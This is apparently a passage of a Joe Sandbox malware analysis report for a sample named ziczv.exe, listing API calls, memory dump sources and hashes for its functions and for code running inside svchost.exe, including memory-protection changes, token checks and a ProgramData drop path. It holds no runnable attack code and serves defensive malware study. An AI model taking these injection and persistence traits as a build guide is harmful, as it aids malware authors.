GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 006F03A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 006F03DA

Memory Dump Source

Source File: 00000016.00000002.2451764821.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f0000_ziczv.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: 4efb9989debf279804fda9ebfbc3a7adc168a40524e05046df3c7abe0d84edb1
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: 5801B573A0411EABFB208A19DC40BBA739AEFD5720F29C525EA05E7342C674DC0245A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe,00000104), ref: 004012A1

Strings

C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe, xrefs: 0040129A
/p=, xrefs: 00401264

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe
API String ID: 514040917-802067494
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 004234A8 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 396COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00432918,0000015C), ref: 0042358F
__aulldiv.LIBCMT ref: 00423916

Strings

uTB, xrefs: 00423517, 00423545, 0042354B, 0042359B, 00423642, 0042365C, 00423722, 00423842, 00423866, 0042388F, 004238C3, 004238CA, 00423935, 00423961, 00423A0E

Memory Dump Source

Source File: 00000016.00000002.2451511987.0000000000421000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_421000_ziczv.jbxd

Similarity

API ID: DirectoryWindows__aulldiv
String ID: uTB
API String ID: 2557273154-3950955333
Opcode ID: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction ID: ec485fc663059ce4ae46598323261169b09f174663d50ce322c37d4fa9724364
Opcode Fuzzy Hash: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction Fuzzy Hash: 76E1D2727003229BC718DF38EDA06E537A2EB98719F59813BD800C73E5E678AD45879D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 5056, Parent PID: 3772COMMON

Executed Functions

Function 02892BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02892BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02892C23

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 065847b0556cc028b4d11253dafa9f3d19e4b9bda048e55b1bcf68a3908268e0
Instruction ID: ce10578a6fd999f4674e984b725e61daf1f024a8712372a431b2debe32333a47
Opcode Fuzzy Hash: 065847b0556cc028b4d11253dafa9f3d19e4b9bda048e55b1bcf68a3908268e0
Instruction Fuzzy Hash: 9811E73D910105AFCF09CF98C954EE937B8EF49324F1942ACE9258B2D5EB30AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0289338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 028933BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 028933E0
GetLastError.KERNEL32 ref: 028933E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02893401
RtlAllocateHeap.NTDLL(00000000), ref: 02893408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02893428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02893448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 0289346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02893480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02893497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0289351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02893527
HeapFree.KERNEL32(00000000), ref: 0289352E

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: d682607363fe5f3b3dbceeada0be9f4031cd4e56b465ba3f6ff675b632770ce7
Instruction ID: 6ece34b4355ffff3c5bf78381a1ba8df6dd07fbff61330db8c8076230ef03cd0
Opcode Fuzzy Hash: d682607363fe5f3b3dbceeada0be9f4031cd4e56b465ba3f6ff675b632770ce7
Instruction Fuzzy Hash: D051CC7D948201DFDB228F29C849BAABBA4FF5A314F1D8988F489C3191D731D548CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02893555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02893570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02893585
GetLastError.KERNEL32 ref: 0289358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 028935A1
RtlAllocateHeap.NTDLL(00000000), ref: 028935A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 028935C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 028935CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 028935F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 028935FD
HeapFree.KERNEL32(00000000), ref: 02893604

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: c1f9a72877720b7e8f1ae3da6f046342c4568162865097ba0daf648d4e717862
Instruction ID: 8294bc4c5d3b35e7b48f4f3ef20f7cb52b430e7c08d6f37a6e216cb4008d58a0
Opcode Fuzzy Hash: c1f9a72877720b7e8f1ae3da6f046342c4568162865097ba0daf648d4e717862
Instruction Fuzzy Hash: DA215BBD960204BBEF314B95DC0EBAEBA38EB45756F1805A4F509E60A0C7318A60DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02892DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,028951B9,?,028970E8,00000000,00000000,?), ref: 02892DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,028951B9,?,028970E8,00000000,00000000,?,00000000), ref: 02892DDC
CloseHandle.KERNEL32(00000000,?,028951B9,?,028970E8,00000000,00000000,?,00000000), ref: 02892E4D

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: ff3d63b33632b13d13f7815f369bbf9c2f9c1901843f81f180e93f53fe3ea804
Instruction ID: 956a8dea01a6b1364da8419a63e383fe0bcf0ba5f82664b307e583a87579354b
Opcode Fuzzy Hash: ff3d63b33632b13d13f7815f369bbf9c2f9c1901843f81f180e93f53fe3ea804
Instruction Fuzzy Hash: 5A11AFBDA40221BFDB214F20DC88A6FBB6CFB4A761F084A18FE46C6184D730C411CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02894068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,0289373D,?,00100000,00000006,?), ref: 0289406D
RtlAllocateHeap.NTDLL(00000000,?,0289373D), ref: 02894074
CreateFileMappingW.KERNELBASE(000000FF,028962B8,00000004,00000000,?,?,?,?,?,0289373D,?,00100000,00000006,?), ref: 0289409B
GetLastError.KERNEL32(?,?,?,0289373D,?,00100000,00000006,?), ref: 028940A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,0289373D,?,00100000,00000006,?), ref: 028940C6
CloseHandle.KERNEL32(00000000,?,?,?,0289373D,?,00100000,00000006,?), ref: 028940D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0289373D,?,00100000,00000006,?), ref: 028940DE
HeapFree.KERNEL32(00000000,?,?,?,0289373D,?,00100000,00000006,?), ref: 028940E5

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: 324f7b47d03ac09b48c148a7180ddd8abac6c53ab57d748f7e482f147acc164d
Instruction ID: a886462eebd1d2d970ab4d68c0ead19c9df226c2d709a2246c73642b0179e390
Opcode Fuzzy Hash: 324f7b47d03ac09b48c148a7180ddd8abac6c53ab57d748f7e482f147acc164d
Instruction Fuzzy Hash: 181182BD684306AFDB208F64EC48F16BBE8EF08715F098828F659DA2D1D730D8108F10

Uniqueness

Uniqueness Score: -1.00%

Function 02891FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02891FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02892009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02892014
CloseHandle.KERNEL32 ref: 02892025

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: a3a8c5279f04abe3063c74dfc61428c9c37786c337d8209007d0b8b827e21ef8
Instruction ID: 2dfa17a1eccf1616736015a86addee8b68da95677a5f488e80add6b5b23a7d6e
Opcode Fuzzy Hash: a3a8c5279f04abe3063c74dfc61428c9c37786c337d8209007d0b8b827e21ef8
Instruction Fuzzy Hash: 02E09A7D9A6131BB9A316B767C0DDC77E5DEF0B2A53094921B80DD0198E7248451CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 028926ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02892709
RtlGetVersion.NTDLL(?), ref: 0289271E

Part of subcall function 02893641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02892790), ref: 02893659

Strings

f<v, xrefs: 028927BD

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: 045e423d12a5dcd2d86060f20f97b0f632b86ab52183971548ccd16bc227e442
Instruction ID: 6b5d1bcda7bab75a68ea85ba00c25253f9a5af2023c393558bfad4d305c527b6
Opcode Fuzzy Hash: 045e423d12a5dcd2d86060f20f97b0f632b86ab52183971548ccd16bc227e442
Instruction Fuzzy Hash: FD21D43DC852BC6EDB119BF468616D67FAC9B26300F0C08D5D948E3782F2A50524DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0289492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,028970E8), ref: 02894982
HeapFree.KERNEL32(00000000,?,00000000,00000000,028970E8), ref: 02894989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,028970E8), ref: 028949B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,028970E8), ref: 028949B8

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: af600ff89681cfe268da723e145aef188a798fb5fa44d3f95a9ddf547468d2d4
Instruction ID: 801e89248f1a90e2bd2c3c9a2f57c3a1fa2da9634ba221caf1c80387e6ba0b6c
Opcode Fuzzy Hash: af600ff89681cfe268da723e145aef188a798fb5fa44d3f95a9ddf547468d2d4
Instruction Fuzzy Hash: 001191BE944208AFDF10DAA4D844BEEF7BCFB49316F084565ED48D6184E73196158B90

Uniqueness

Uniqueness Score: -1.00%

Function 02892C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(028963B4,?), ref: 02892C67

Part of subcall function 028955BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 028955D3
Part of subcall function 028955BC: CreateDirectoryW.KERNELBASE(?,028962B8), ref: 0289561C

Part of subcall function 02892D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02892D86
Part of subcall function 02892D40: RtlFreeHeap.NTDLL(00000000), ref: 02892D8D

lstrcpyW.KERNEL32(028963B4,?), ref: 02892CC7
lstrcatW.KERNEL32(?,0289738C), ref: 02892CD9

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: de7fe8388afa933c2dba63030b9758bda17b42828595d448d2fe351c7aac26ba
Instruction ID: 9dd402c0469bccb27c8420fef46cbcce73848cd598d783aad6a8c5a9e787bca1
Opcode Fuzzy Hash: de7fe8388afa933c2dba63030b9758bda17b42828595d448d2fe351c7aac26ba
Instruction Fuzzy Hash: 2C21F9BA94021CAFEF11DFA8DC49BDA77BCAB05304F480466F909D2195EB349658CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02892833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02892858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0289287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 028928A3

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: 6379e241c06b654271b4ddbbfe5c0a3ce2ef4036becf60caa7c28fa2490a83f3
Instruction ID: 3188a63bf2617279212d8cae474df4826d41c32672410fb90429087c16cd14ef
Opcode Fuzzy Hash: 6379e241c06b654271b4ddbbfe5c0a3ce2ef4036becf60caa7c28fa2490a83f3
Instruction Fuzzy Hash: 08215EBA940258AFCB25CF65E8849DB7BACEF05314B080526FC19D3281E730D91ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 02895108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 028954AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 028954C0
Part of subcall function 028954AC: CreateDirectoryW.KERNELBASE(00000000,028962B8), ref: 02895500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0289513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0289515E
CloseHandle.KERNEL32(00000000), ref: 02895167

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: 708f3efa8e8e05c3e02190d122e971096166eca8b7b17a11540648dcaf74b4fa
Instruction ID: d91b7c43e76fa85bb8b42c38f12c2d9fc7533e537e41f47a00c3bd8d305e9331
Opcode Fuzzy Hash: 708f3efa8e8e05c3e02190d122e971096166eca8b7b17a11540648dcaf74b4fa
Instruction Fuzzy Hash: 56014E7E544308BFDB315E60FC48F6BB79CE785B64F544A29FB55C20C0E33555048A61

Uniqueness

Uniqueness Score: -1.00%

Function 02892EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02892D76,?,?,?,?), ref: 02892ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,02892D76,?,?,?,?,?), ref: 02892EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02892D76,?,?,?,?,?), ref: 02892EFD

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: d66675830e9798ae34cbe7355f2153ac6442f96ab131c127611255381da7afa7
Instruction ID: 97ecb74de2113a699bf556f4babbf792b0a131df9527cb76d88aeaae21abc711
Opcode Fuzzy Hash: d66675830e9798ae34cbe7355f2153ac6442f96ab131c127611255381da7afa7
Instruction Fuzzy Hash: 33F0F67AA55118BFDF308971AC48FABBA6CEB467B4F040621FD09D3081D330490086F0

Uniqueness

Uniqueness Score: -1.00%

Function 02892D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02892DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,028951B9,?,028970E8,00000000,00000000,?), ref: 02892DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 02892DA5

Part of subcall function 02892EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02892D76,?,?,?,?), ref: 02892ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02892D86
RtlFreeHeap.NTDLL(00000000), ref: 02892D8D

